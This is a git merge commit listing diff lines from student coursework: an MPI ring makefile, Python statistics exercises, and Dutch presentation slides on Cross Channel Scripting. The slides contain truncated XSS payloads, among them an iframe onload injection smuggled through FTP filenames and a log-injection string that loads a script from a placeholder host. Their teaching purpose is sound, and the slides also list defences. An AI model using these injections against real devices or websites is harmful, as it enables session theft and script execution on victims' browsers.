Commit 2306b5f7 authored by Sander Mathijs van Veen's avatar Sander Mathijs van Veen

Merge branch 'master' of

parents ebe6733d 011be19a
CFLAGS=-Wall -Wextra -pedantic -std=c99 -O2
all: ring
ring: ring.o
rm -vf *.o ring
#include <stdlib.h>
#include <stdio.h>
#include <mpi.h>
int main(int argc, char **argv) {
MPI_Init(&argc, &argv);
mpirun -np $NUM_PROCESSES --mca pls_rsh_agent $RSH_AGENT \
all: xcs.pdf
xcs.pdf: xcs.tex
pdflatex xcs
pdflatex xcs
rm -v *.out *.aux *.toc xcs.pdf
\title{The emergence of Cross Channel Scripting}
\author{Tadde\"us Kroes}
\section{Introductie Cross Site Scripting}
\frametitle{Cross Site Scripting (XSS)}
\item Invoegen van scripts op een webpagina door slechte validatie
\item Web to web
\item presistent of non-persistent
\frametitle{Cross Site Scripting: een simpel voorbeeld}
\caption{Aanvaller voert een script dat de sessie uitleest}
\frametitle{Cross Site Scripting: een simpel voorbeeld (2)}
\caption{Gebruiker bezoekt pagina, script wordt uitgevoerd}
\section{Cross Channel Scripting}
\frametitle{Cross Channel Scripting (XCS)}
\item Non-web to web
\item Infectie gaat over een andere ``channel'' dan executie:
aanvaller -> protocol A -> service A # infectie
doewit <- protocol B <- service B # executie
\item Persistent
\item Twee op zichzelf veilige services A en B zijn samen onveilig
\item Moeilijker te detecteren dan XSS
\frametitle{Voorbeeld XSC: FTP exploit}
Een apparaat upload bestanden naar web-interface, kunnen we een script
meesturen in de bestandsnaam? \\
\item Bestandsnaam heeft beperkte lengte
\item Bestandsnamen kunnen geen '/' bevatten
\frametitle{Voorbeeld XSC: FTP exploit (2)}
"<iframe onload='javascript:document.write(
&apos;<html><head><&#47;head><body><script src
\item Laad een extern script \url{} (van
willekeurige lengte)
\item Splits eventueel over meerdere bestandsnamen
\item Pas HTML escaping toe om '/' te vervangen
\item Gebruik iframe \texttt{onload}-event voor omzeilen van
character set
\subsection{Voorbeeld: Log-based XCS}
\frametitle{Voorbeeld: Log-based XCS}
r","","");\\/--></script><script src="http://xxx"></script>
\section{Reverse XCS}
\frametitle{Reverse XCS}
\item Web to non-web
\frametitle{Voorbeeld RXCS: The ghost in the photo frame}
\frametitle{RESTful RXCS}
\item Encoding/escaping
\item Valideren van onvertrouwde HTML-uitvoer
\item Cookies
\item Blokkeren van scripts door gebruiker
\frametitle{Meer informatie}
\item \url{\_scripting}
.PHONY: all clean
rm -vf *.pyc q*.pdf
from pylab import array, eig, diagflat, dot, sqrt, randn, tile, \
plot, subplot, axis, figure, clf, savefig
plot, subplot, axis, figure, clf, show
# The used mu (mean vector) and cov (covariance matrix).
mu = array([[3],
......@@ -18,7 +18,8 @@ cov = array(
samples = 1000
vector_size = 4
def dataset():
def dataset(samples):
"""Generate a dataset, consisting of a soecified number of random vectors."""
# The covariance matrix is used to transform the generated dataset into a
# multivariant normal distribution dataset.
d, U = eig(cov)
......@@ -31,12 +32,12 @@ if __name__ == '__main__':
# Create a n*n grid of subplots and generate a new dataset.
Y = dataset()
Y = dataset(samples)
for i in range(vector_size):
for j in range(vector_size):
# Skip the diagonal subplots since those are irrelevant.
if i != j:
subplot(vector_size, vector_size, (i+1) + j*vector_size)
subplot(vector_size, vector_size, (i + 1) + j * vector_size)
plot(Y[i], Y[j], 'x')
from q21_multivariate import dataset
from sys import argv, exit
from q21_multivariate import mu, cov, dataset
from pylab import array, mean, tile, newaxis, dot, eigvals, \
axis, figure, clf, show, plot
axis, figure, clf, show, plot, sum
def eigenvalues(n):
"""Return eigenvalues of unbiased estimators for the covariance matrix
Sigma (based on a pseudo-random generated dataset)."""
if len(argv) == 3:
step = int(argv[2])
elif len(argv) == 2:
step = 100
print 'Usage: python %s SAMPLES [ STEP_SIZE ]' % (argv[0])
Y = array([mean(dataset(), 1) for i in range(n)]).T
# `samples' is the size of the generated dataset.
samples = int(argv[1])
Y = dataset(samples)
def estimate(n):
"""Return eigenvalues of unbiased estimators for the covariance matrix
Sigma (based on a pseudo-random generated dataset)."""
# Sigma = 1 / (n - 1) * Sum for i=1 to n: (x_i - x_mean) T(x_i - x_mean),
# where T(x) is the transpose of `x'. Mu = x_mean and
# Yzm = Sum for i=1 to n: x_i - x_mean.
mu = mean(Y, 1)
Yzm = Y - tile(mu[:,newaxis], n)
S = dot(Yzm, Yzm.T) / (n - 1)
return eigvals(S)
sliced = [Y[i][:n] for i in range(len(Y))]
est_mu = mean(sliced, 1)
Yzm = sliced - tile(est_mu[:,newaxis], n)
est_cov = dot(Yzm, Yzm.T) / (n - 1)
return (est_mu, est_cov)
max_range = 10000
samples = range(2, max_range, 500)
data = [[] for i in range(4)]
for n in samples:
e = eigenvalues(n)
for i in range(4):
for i in range(4):
plot(samples, data[i], 'x')
axis([0, max_range, 0., 0.025])
# Part 1 - Estimate mu and cov, experiment with various sizes of datasets.
# We use steps of 100 for the number of used samples.
X = range(step, samples + 1, step)
diff_mu = []
diff_cov = []
estimated_mu = []
for n in X:
est_mu, est_cov = estimate(n)
diff_mu.append(abs(sum(est_mu - mu)))
diff_cov.append(abs(sum(est_cov - cov)))
plot(X, diff_mu)
plot(X, diff_cov)
# Observe in the following graph that the accuracy increases when more
# vectors from the generated dataset are used. There are some fluctuations due
# to the randomness of the dataset, but the difference lines should converge to
# zero.
# Part 2 - Calculate covariance of estimated mu.
sample_count = len(estimated_mu)
estimated_mu = array(estimated_mu).T
m = mean(estimated_mu, 1)
Yzm = estimated_mu - tile(m[:,newaxis], sample_count)
S = dot(Yzm, Yzm.T) / (samples - 1)
# When many samples are used to calculate the estimators, the estimators will
# converge to the original values. The more samples are uses each time, the more
# convergence will occur, which will lead to smaller eigenvalues of the
# covariance matrix (printed below). For example, call the program with 1000 and
# 10000 samples and you will see that the eigenvalues will be smaller with 10000
# samples.
print eigvals(S)
from pylab import loadtxt, figure, plot, subplot, axis, clf, savefig
from pylab import loadtxt, figure, plot, subplot, axis, clf, show
# The last column of the data sets is a label, which is used to distinguish the
# three groups of data in the data sets. This label should be translated to a
......@@ -28,4 +28,8 @@ for i in range(4):
for c in range(3):
tmp = zip(*graph_data[i + j*4][c])
plot(tmp[0], tmp[1], 'x' + colors[c])
# In the following plot, we can see that the colored areas do not overlap in
# the same place in all subplots. Thus, using all plots, we could probably
# classify a given data point to one of the iris classes (except for some points
# in the blue/green areas, these overlap much in a small area).
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